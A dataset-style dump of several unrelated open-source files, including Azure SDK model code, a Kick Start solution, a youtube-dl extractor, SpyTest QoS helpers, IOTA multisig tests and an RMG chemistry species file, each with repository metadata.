cached_mems_list.append(memory_states)
if return_mems:
return cached_mems_list
else:
return cached_mems_list[-1]
def eval(self):
self.diagonal = None
super().eval()
def train(self, mode=True):
if mode is True:
self.diagonal = 0
else:
self.diagonal = None
super().train(mode)
def input_example(self):
"""
Generates input examples for tracing etc.
Returns:
A tuple of input examples.
"""
sample = next(self.parameters())
input_ids = torch.randint(low=0, high=2048, size=(2, 16, 1024), device=sample.device)
encoder_mask = torch.randint(low=0, high=1, size=(2, 16), device=sample.device)
return tuple([input_ids, encoder_mask, input_ids, encoder_mask])
| [
"[email protected]"
]
| |
08541c40fee9474b87a66113054f486ea71f0e98 | ba0e07b34def26c37ee22b9dac1714867f001fa5 | /azure-mgmt-network/azure/mgmt/network/models/network_interface.py | fa19b8e2ad03dfa74bef269fdcb7d724b08d0661 | [
"MIT"
]
| permissive | CharaD7/azure-sdk-for-python | b11a08ac7d24a22a808a18203072b4c7bd264dfa | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | refs/heads/master | 2023-05-12T12:34:26.172873 | 2016-10-26T21:35:20 | 2016-10-26T21:35:20 | 72,448,760 | 1 | 0 | MIT | 2023-05-04T17:15:01 | 2016-10-31T15:14:09 | Python | UTF-8 | Python | false | false | 4,531 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
# NOTE: Code generated by Microsoft (R) AutoRest Code Generator — the
# serialization maps below must stay in sync with the service's wire format;
# hand edits will be lost on regeneration.
class NetworkInterface(Resource):
    """A NetworkInterface in a resource group.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :param id: Resource Id
    :type id: str
    :ivar name: Resource name
    :vartype name: str
    :ivar type: Resource type
    :vartype type: str
    :param location: Resource location
    :type location: str
    :param tags: Resource tags
    :type tags: dict
    :param virtual_machine: Gets or sets the reference of a VirtualMachine
    :type virtual_machine: :class:`SubResource
     <azure.mgmt.network.models.SubResource>`
    :param network_security_group: Gets or sets the reference of the
     NetworkSecurityGroup resource
    :type network_security_group: :class:`NetworkSecurityGroup
     <azure.mgmt.network.models.NetworkSecurityGroup>`
    :param ip_configurations: Gets or sets list of IPConfigurations of the
     network interface
    :type ip_configurations: list of :class:`NetworkInterfaceIPConfiguration
     <azure.mgmt.network.models.NetworkInterfaceIPConfiguration>`
    :param dns_settings: Gets or sets DNS settings in network interface
    :type dns_settings: :class:`NetworkInterfaceDnsSettings
     <azure.mgmt.network.models.NetworkInterfaceDnsSettings>`
    :param mac_address: Gets the MAC address of the network interface
    :type mac_address: str
    :param primary: Gets whether this is a primary NIC on a virtual machine
    :type primary: bool
    :param enable_ip_forwarding: Gets or sets whether IPForwarding is enabled
     on the NIC
    :type enable_ip_forwarding: bool
    :param resource_guid: Gets or sets resource guid property of the network
     interface resource
    :type resource_guid: str
    :param provisioning_state: Gets provisioning state of the PublicIP
     resource Updating/Deleting/Failed
    :type provisioning_state: str
    :param etag: Gets a unique read-only string that changes whenever the
     resource is updated
    :type etag: str
    """

    # Server-populated fields: clients must not set these.
    _validation = {
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    # Maps Python attribute -> JSON path and msrest type for (de)serialization.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'virtual_machine': {'key': 'properties.virtualMachine', 'type': 'SubResource'},
        'network_security_group': {'key': 'properties.networkSecurityGroup', 'type': 'NetworkSecurityGroup'},
        'ip_configurations': {'key': 'properties.ipConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
        'dns_settings': {'key': 'properties.dnsSettings', 'type': 'NetworkInterfaceDnsSettings'},
        'mac_address': {'key': 'properties.macAddress', 'type': 'str'},
        'primary': {'key': 'properties.primary', 'type': 'bool'},
        'enable_ip_forwarding': {'key': 'properties.enableIPForwarding', 'type': 'bool'},
        'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
    }

    def __init__(self, id=None, location=None, tags=None, virtual_machine=None, network_security_group=None, ip_configurations=None, dns_settings=None, mac_address=None, primary=None, enable_ip_forwarding=None, resource_guid=None, provisioning_state=None, etag=None):
        super(NetworkInterface, self).__init__(id=id, location=location, tags=tags)
        self.virtual_machine = virtual_machine
        self.network_security_group = network_security_group
        self.ip_configurations = ip_configurations
        self.dns_settings = dns_settings
        self.mac_address = mac_address
        self.primary = primary
        self.enable_ip_forwarding = enable_ip_forwarding
        self.resource_guid = resource_guid
        self.provisioning_state = provisioning_state
        self.etag = etag
| [
"[email protected]"
]
| |
cbc244e711bf6a4c305a2d03973ffb5ac09658b0 | 85a6fcace7eaff15242595bdf9b9e8f41116dc7f | /Round A/workout.py | 7d0a0bd6e2ed76a2a224a03c3a89e1a9f3b430f1 | [
"MIT"
]
| permissive | Meenadshi/GoogleKickStart-2020 | e0dfd4f2e44a39c5c58de034265baf2fc7a81f9b | 7c60b5a7a6c9daaf3f20b28d6b60aab19f5f22df | refs/heads/main | 2023-08-15T23:41:31.484139 | 2021-10-17T00:34:58 | 2021-10-17T00:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Kick Start 2020 Round A - Problem C. Workout
# https://codingcompetitions.withgoogle.com/kickstart/round/000000000019ffc7/00000000001d3f5b
#
# Time: O(Nlog(MAX_DIFF))
# Space: O(1)
#
def check(M, K, target):
    """Return True if at most K extra sessions make every gap in M <= target.

    For each consecutive pair, ceil(diff/target) - 1 insertions are needed;
    ``((diff) - 1) // target`` computes that in one integer division.  Uses
    ``range`` instead of the Python 2-only ``xrange`` so the helper also runs
    under Python 3 (identical behavior on Python 2).

    Args:
        M: sorted list of session positions.
        K: maximum number of insertions allowed.
        target: candidate maximum gap.
    """
    count = 0
    for i in range(1, len(M)):
        count += ((M[i] - M[i - 1]) - 1) // target  # ceiling(diff/target)-1
        if count > K:
            return False
    return True
def workout():
    # NOTE(review): Python 2 code (``raw_input``/``xrange``); not runnable
    # under Python 3 as-is.
    # Reads N (session count) and K (allowed insertions), then the sorted
    # session list M, and binary-searches the smallest feasible maximum gap
    # over [1, largest existing gap] using check() as the predicate.
    N, K = map(int, raw_input().strip().split())
    M = map(int, raw_input().strip().split())
    left, right = 1, max(M[i]-M[i-1] for i in xrange(1, len(M)))
    while left <= right:
        mid = left + (right-left)//2
        if check(M, K, mid):
            # mid is feasible; try a smaller maximum gap.
            right = mid-1
        else:
            left = mid+1
    return left
# Python 2 driver: the first input line is the number of test cases.
for case in xrange(input()):
    print 'Case #%d: %s' % (case+1, workout())
| [
"[email protected]"
]
| |
ab81b868a0040eb8cd4674fd20d3f934f5141499 | 981ecc9cf59dd6f839c3e40d26601efb1d073558 | /src/face_recognition/youtube_dl/extractor/tf1.py | e595c4a69b3f03361abc05f6bca61adecb61cf36 | [
"MIT"
]
| permissive | lodemo/CATANA | 469e0684b816f09ac74f186552b463cc77db369e | a349f460772511ccbb16429b40bfb50f774d45d4 | refs/heads/master | 2023-03-30T04:07:12.070332 | 2021-02-03T21:47:32 | 2021-02-03T21:47:32 | 102,767,095 | 12 | 6 | MIT | 2023-03-24T21:55:24 | 2017-09-07T17:36:45 | Jupyter Notebook | UTF-8 | Python | false | false | 2,239 | py | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
"""TF1 uses the wat.tv player."""
_VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
_TESTS = [{
'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
'info_dict': {
'id': '10635995',
'ext': 'mp4',
'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
}, {
'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
'info_dict': {
'id': 'le-grand-mysterioso-chuggington-7085291-739',
'ext': 'mp4',
'title': 'Le grand Mystérioso - Chuggington',
'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
'upload_date': '20150103',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
'skip': 'HTTP Error 410: Gone',
}, {
'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
'only_matching': True,
}, {
'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
'only_matching': True,
}, {
'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
wat_id = self._html_search_regex(
r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
webpage, 'wat id', group='id')
return self.url_result('wat:%s' % wat_id, 'Wat')
| [
"[email protected]"
]
| |
256a78690243b47369486b84acba56ba650f403c | 4131625553ff59b4c730ae7148dd5d603d8cb87d | /hackerEarth/challenges/iitKanpurFreshersProgrammingContest2016/pokeluck.py | 30419fb90a7798a46de3e00cf2d4155fda419afc | [
"MIT",
"Apache-2.0"
]
| permissive | odonnmi/learnNPractice | 29034304303aab3827e6b3334b1d7d9d65b93e54 | eb1c775e4d6e35cebb7b109b46b91f9aecb2d9ec | refs/heads/master | 2020-12-04T14:52:00.520219 | 2019-09-03T06:30:03 | 2019-09-03T06:30:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | # Pokeluck
#######################################################################################################################
#
# Mewtwo is one of the rarest and most famous pokemons in thw pokemon world. If any pokemon gets to fight with
# Mewtwo, he is considered to be "1-lucky". A pokemon that gets to fight with the pokemon who has fought with
# Mewtwo is considered to be "2-lucky", and so on.
#
# The Luckiness is defined on the basis of above mentioned rule. ( 1-Lucky -> Luckiness = 1).
#
# Note1: Consider luckiness of Mewtwo to be 0 .
#
# Note2: No one has negative luckiness.
#
# Note3: If a pokemon A is not Mewtwo himself, and has battled with someone with luckiness X, and has not battled
# with anyone with Luckiness smaller than X, then A has luckiness X+1 .
#
# Note4: It is ensured that every pokemon has finite positive luckiness.
#
# Input:
#
# The first line has two numbers: A,number of pokemons being considered and B, number of pokemon battles
# that have happened.
#
# Then B lines follow, each containing two distinct pokemons, denoting that the two pokemons have battled.
# Pokemons are represented by numbers between 1 and A.
#
# Mewtwo is represented by 1.
#
# Output Format:
#
# Output A-1 lines , ith line containing the luckiness of ith pokemon. (2 <= i <= A)
#
# Constraints:
#
# A <= 1000
#
# B <= (A(A-1))/2 ]
#
#######################################################################################################################
# Input
#
# 3 2
# 1 2
# 2 3
#######################################################################################################################
# Output
#
# 1
# 2
####################################################################################################################### | [
"[email protected]"
]
| |
e4d0583561a6158725a236905afe2fbba09c6263 | d1ad901e1e926d9c92ce4dc7a7ba3c6ee91a65e2 | /spytest/apis/qos/qos.py | c4158600f29cdeb92e9d1a8b3ac6ac00fa192bab | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
]
| permissive | SubhajitPalKeysight/sonic-mgmt | ff59c2c5baf53cc2575aea2d541278fc9cf56977 | e4b308a82572996b531cc09cbc6ba98b9bd283ea | refs/heads/master | 2022-12-31T01:03:47.757864 | 2020-10-15T11:04:37 | 2020-10-15T11:04:37 | 286,815,154 | 1 | 1 | NOASSERTION | 2020-08-11T18:08:34 | 2020-08-11T18:08:33 | null | UTF-8 | Python | false | false | 5,034 | py | import re
from spytest.utils import filter_and_select
from spytest import st
import json
def verify_qos_queue_counters(dut,port,queue_name,param_list,val_list,tol_list):
'''
verifies QOS queue counters in the CLI show qos queue counters
:param dut: Device name where the command to be executed
:type dut: string
:param port: interface name to be checked
:type dut: string
:param queue_name: queue name to be checked
:type dut: string
:param param_list: list of params to be verified; example ['pkts_count', 'pkts_drop']
:param val_list: list of expected values for the params specified; example ['10000','5000']
:param tol_list: tolerence value for each param while comparing; for example ['1000', '500']
:return: True/False True - success case; False - Failure case
usage: verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count', 'pkts_drop'],
['10000','5000'],['1000', '500'])
verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count'],['10000'],['1000'])
Created by: Julius <[email protected]
'''
success = True
cli_out = st.show(dut,'show queue counters {}'.format(port))
fil_out = filter_and_select(cli_out, param_list, {"port" : port, "txq" : queue_name})
if not fil_out:
st.error('port: {} and queue name: {} not found in output: {}'.format(port,queue_name,cli_out))
return False
else:
fil_out = fil_out[0]
for param,val,tol in zip(param_list,val_list,tol_list):
try:
fil_out[param] = re.sub(",","",fil_out[param])
int(fil_out[param])
except ValueError:
st.error('cannot get integer value from obtained string: {}'.format(fil_out[param]))
return False
if int(fil_out[param])<=int(val)+int(tol) and int(fil_out[param])>=int(val)-int(tol):
st.log('obtained value: {} is in the range b/w {} and {} as expected for param: {}'
'in queue: {}'.format(int(fil_out[param]),int(val)-int(tol),
int(val)+int(tol),param,queue_name))
else:
st.error('obtained value: {} is NOT in the range b/w {} and {} for param: {}'
'in queue: {}'.format(int(fil_out[param]), int(val) - int(tol),
int(val) + int(tol), param, queue_name))
success = False
return True if success else False
def clear_qos_queue_counters(dut):
'''
:param dut: DUT name where CLI to be executed
:type dut: string
:return: True/False True - Success ; False - Failure
usage:
clear_qos_queue_counters(dut1)
Created by: Julius <[email protected]
'''
return True if st.show(dut,'show queue counters --clear',skip_tmpl=True) else False
def bind_qos_map_port(dut, map_name, obj_name, interface):
'''
:param dut: device to be configured
:type dut: string
:param map_name: qos map name for example dscp_to_tc_map, tc_to_queue_map
:type map_name: string
:param obj_name: object name for example AZURE
:type obj_name: string
:param interface: interface to be associated for example Ethernet1
:type interface: string
:return: True/False True - Success ; False - Failure
usage:
bind_qos_map_port(dut1, "tc_to_queue_map", "Azure", "Ethernet0")
bind_qos_map_port(dut1, "dscp_to_tc_map", "Azure", "Ethernet2")
bind_qos_map_port(dut1, "tc_to_pg_map", "Azure", "Ethernet72")
Created by: Julius <[email protected]
'''
final_data, temp_data = dict(), dict()
data = { map_name : "[" + map_name.upper() + "|" + obj_name + "]"}
temp_data[interface] = data
final_data['PORT_QOS_MAP'] = temp_data
data_json = json.dumps(final_data)
return st.apply_json(dut, data_json)
def clear_qos_config(dut):
'''
Author: Chaitanya Vella ([email protected])
Clears all the QOS realted config from the device
:param dut:
:return:
'''
command = "config qos clear"
st.config(dut, command)
def create_qos_json(dut, block_name, sub_block, dict_input):
'''
:param dut: device to be configured
:type dut: string
:param block_name: name of the field in json, for eg: dscp_to_tc_map, tc_to_queue_map, wred_profile etc
:type block_name: string
:param sub_block: sub field name, for eg: AZURE, AZURE_LOSSLESS etc
:type sub_block: string
:param dict_input: input values in dictionary
:type dict_input: string
:return: True/False True - Success ; False - Failure
usage:
create_qos_json(dut1, "tc_to_queue_map", "Azure", {"wred_green_enable" : "true"})
Created by: Julius <[email protected]
'''
final_data, temp_data = dict(), dict()
temp_data[sub_block] = dict_input
final_data[block_name.upper()] = temp_data
final_data = json.dumps(final_data)
return st.apply_json(dut, final_data)
| [
"[email protected]"
]
| |
6585fb31b416dfd35f83c956c594528d69b6d742 | 3fe5046326c0e6a63b9de6ab4de8f094f1e49614 | /bin/indent-ged | 165c4adbf540abe1e9a436dfd7f6e341711abfa8 | []
| no_license | dave-shawley/ged-work | cc7d6b71a58e3ac05d94177c018efe969fc60e0d | 1edc7d6c2b871d65668a7ec347a42d3727e615d1 | refs/heads/master | 2020-03-23T22:01:52.407922 | 2019-04-21T14:33:06 | 2019-04-21T14:33:06 | 142,148,536 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | #!/usr/bin/env python
#
import sys
with open(sys.argv[1], 'r+') as f:
lines = f.readlines()
f.seek(0)
for line in lines:
indent, rest = line.split(None, 1)
f.write('\t' * int(indent))
f.write(line)
| [
"[email protected]"
]
| ||
cefb634734daaaddf09a98024d5ec5e44fb354b5 | edb88981aa1420af7e074068ed7818b9d904a3dd | /tags/release-0.4.2/minds/test/test_cachefile.py | 550d17ef92064fd5da222650ab9c462809cf2eb8 | []
| no_license | BackupTheBerlios/mindretrieve-svn | 101c0f1dfc25d20d5f828b6fd0d43301b773af4e | 463745fcf1c1d5b1f6c201c30bcc339c99b437ed | refs/heads/master | 2021-01-22T13:57:31.225772 | 2006-04-28T04:24:43 | 2006-04-28T04:24:43 | 40,801,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | """
"""
import os, os.path, sys
import unittest
from config_help import cfg
from minds import cachefile
class TestCacheFile(unittest.TestCase):
FILE1 = 'testcache'
def setUp(self):
self.pathname = os.path.join(cfg.getPath('logs'), self.FILE1)
self.cleanup()
def tearDown(self):
self.cleanup()
def cleanup(self):
# hardcode path to avoid deleting real data in config goof
try: os.remove('testlogs/' + self.FILE1 + '.mlog')
except OSError: pass
try: os.remove('testlogs/' + self.FILE1 + '.qlog')
except OSError: pass
def test_write(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
c.write_qlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.qlog'))
self.assert_(os.path.getsize(self.pathname+'.qlog'),5)
c.write_mlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.mlog'))
self.assert_(os.path.getsize(self.pathname+'.mlog'),5)
def test_discard(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
c.discard()
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
if __name__ == '__main__':
unittest.main() | [
"tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990"
]
| tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990 |
788e4f26f9ce4a49e8009089a81dd509608996ca | 1c527a1944264784ba6ed237a723376bdee47f02 | /src/utl/strip_csv.py | 0c3dc9fa82235b03ec8b3ca868c5a6d64b12ed89 | []
| no_license | mikegleen/modes | 3544517467b77ddb21ec50c2a624b98e0a7ea308 | e77c89f28c623ce8fd30d7727a1b914461c6a0fd | refs/heads/master | 2023-09-03T15:10:26.931110 | 2023-08-27T07:31:42 | 2023-08-27T07:31:42 | 139,562,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | """
For each cell in a CSV file, strip leading and trailing whitespace.
"""
import codecs
import csv
import sys
def main():
incsv = codecs.open(sys.argv[1], 'r', 'utf-8-sig')
outcsv = codecs.open(sys.argv[2], 'w', 'utf-8-sig')
outwriter = csv.writer(outcsv)
for row in csv.reader(incsv):
for column in range(len(row)):
row[column] = row[column].strip() if row[column] else row[column]
outwriter.writerow(row)
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
08a13407b68ca6cda24394e7cdfc4eb4314bec1e | bc64931a5cdfed6d54a8d8828e9b9d4510d7a998 | /test/multisig/commands/create_multisig_address_test.py | 83ae9dbd6d76cdcf5210d0bea2085f4dc26f7cac | [
"MIT"
]
| permissive | valentinlehuger/iota.lib.py | 4b9ddfda9c283b4fde6d9ba6ab5d6c1add5cd920 | e345de981829a36ceaccf3862835c0dd28486950 | refs/heads/master | 2021-01-19T12:26:09.709236 | 2017-07-16T01:19:39 | 2017-07-16T01:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,866 | py | # coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from unittest import TestCase
import filters as f
from filters.test import BaseFilterTestCase
from iota import TryteString
from iota.adapter import MockAdapter
from iota.crypto.types import Digest
from iota.filters import Trytes
from iota.multisig import MultisigIota
from iota.multisig.commands import CreateMultisigAddressCommand
from iota.multisig.types import MultisigAddress
from six import binary_type, text_type
class CreateMultisigAddressCommandTestCase(TestCase):
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressCommandTestCase, self).setUp()
self.adapter = MockAdapter()
self.command = CreateMultisigAddressCommand(self.adapter)
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_wireup(self):
"""
Verify that the command is wired up correctly.
"""
self.assertIsInstance(
MultisigIota(self.adapter).createMultisigAddress,
CreateMultisigAddressCommand,
)
def test_happy_path(self):
"""
Generating a multisig address.
"""
result = self.command(digests=[self.digest_1, self.digest_2])
# noinspection SpellCheckingInspection
self.assertDictEqual(
result,
{
'address':
MultisigAddress(
trytes =
b'JUIFYSUQFVBFGNHOJMLWBHMGASFGBPAUMRZRRCJF'
b'CCOJHJKZVUOCEYSCLXAGDABCEWSUXCILJCGQWI9SF',
digests = [self.digest_1, self.digest_2],
),
},
)
class CreateMultisigAddressRequestFilterTestCase(BaseFilterTestCase):
filter_type = CreateMultisigAddressCommand(MockAdapter()).get_request_filter
skip_value_check = True
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressRequestFilterTestCase, self).setUp()
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_pass_happy_path(self):
"""
Request is valid.
"""
request = {
'digests': [self.digest_1, self.digest_2],
}
filter_ = self._filter(request)
self.assertFilterPasses(filter_)
self.assertDictEqual(filter_.cleaned_data, request)
def test_pass_compatible_types(self):
"""
Request contains values that can be converted to the expected
types.
"""
filter_ = self._filter({
# ``digests`` may contain any values that can be converted into
# :py:class:`Digest` objects.
'digests': [binary_type(self.digest_1), TryteString(self.digest_2)],
})
self.assertFilterPasses(filter_)
self.assertDictEqual(
filter_.cleaned_data,
{
'digests': [self.digest_1, self.digest_2],
},
)
def test_fail_empty(self):
"""
Request is empty.
"""
self.assertFilterErrors(
{},
{
'digests': [f.FilterMapper.CODE_MISSING_KEY],
},
)
def test_fail_unexpected_parameters(self):
"""
Request contains unexpected parameters.
"""
self.assertFilterErrors(
{
'digests': [self.digest_1, self.digest_2],
# Oh, and I suppose that's completely inconspicuous.
'foo': 'bar',
},
{
'foo': [f.FilterMapper.CODE_EXTRA_KEY],
},
)
def test_fail_digests_null(self):
"""
``digests`` is null.
"""
self.assertFilterErrors(
{
'digests': None,
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_wrong_type(self):
"""
``digests`` is not an array.
"""
self.assertFilterErrors(
{
'digests': self.digest_1,
},
{
'digests': [f.Array.CODE_WRONG_TYPE],
},
)
def test_fail_digests_empty(self):
"""
``digests`` is an array, but it's empty.
"""
self.assertFilterErrors(
{
'digests': [],
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_contents_invalid(self):
"""
``digests`` is an array, but it contains invalid values.
"""
self.assertFilterErrors(
{
'digests': [
b'',
True,
None,
b'not valid trytes',
# This is actually valid; I just added it to make sure the
# filter isn't cheating!
TryteString(self.digest_1),
2130706433,
],
},
{
'digests.0': [f.Required.CODE_EMPTY],
'digests.1': [f.Type.CODE_WRONG_TYPE],
'digests.2': [f.Required.CODE_EMPTY],
'digests.3': [Trytes.CODE_NOT_TRYTES],
'digests.5': [f.Type.CODE_WRONG_TYPE],
},
)
| [
"[email protected]"
]
| |
12098a4349966f1bb91731bacb395b298b3dec81 | 04803c70bb97012b7d500a177ac0240fb2ddbe38 | /3heptane_pdep/pdep/network42_1.py | ba15fe7bcaabbec6ac0c67a81fd946ab69ff1f2e | []
| no_license | shenghuiqin/chpd | 735e0415f6688d88579fc935459c1b0f53596d1d | 396ba54629036e3f2be0b3fabe09b78c90d56939 | refs/heads/master | 2023-03-01T23:29:02.118150 | 2019-10-05T04:02:23 | 2019-10-05T04:02:23 | 192,084,217 | 0 | 0 | null | 2019-06-18T18:33:13 | 2019-06-15T13:52:28 | HTML | UTF-8 | Python | false | false | 51,612 | py | species(
label = 'CCCC(CCC)O[O](138)',
structure = SMILES('CCCC(CCC)O[O]'),
E0 = (-164.605,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4082.6,'J/mol'), sigma=(7.30891,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=637.69 K, Pc=23.73 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.385645,0.0992146,-7.63202e-05,3.28023e-08,-6.09818e-12,-19642.1,35.265], Tmin=(100,'K'), Tmax=(1218.12,'K')), NASAPolynomial(coeffs=[12.329,0.0574631,-2.49073e-05,4.66449e-09,-3.23359e-13,-22739.7,-28.5844], Tmin=(1218.12,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-164.605,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(552.912,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'O2(2)',
structure = SMILES('[O][O]'),
E0 = (-8.62178,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1483.7],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (31.9988,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(887.157,'J/mol'), sigma=(3.467,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
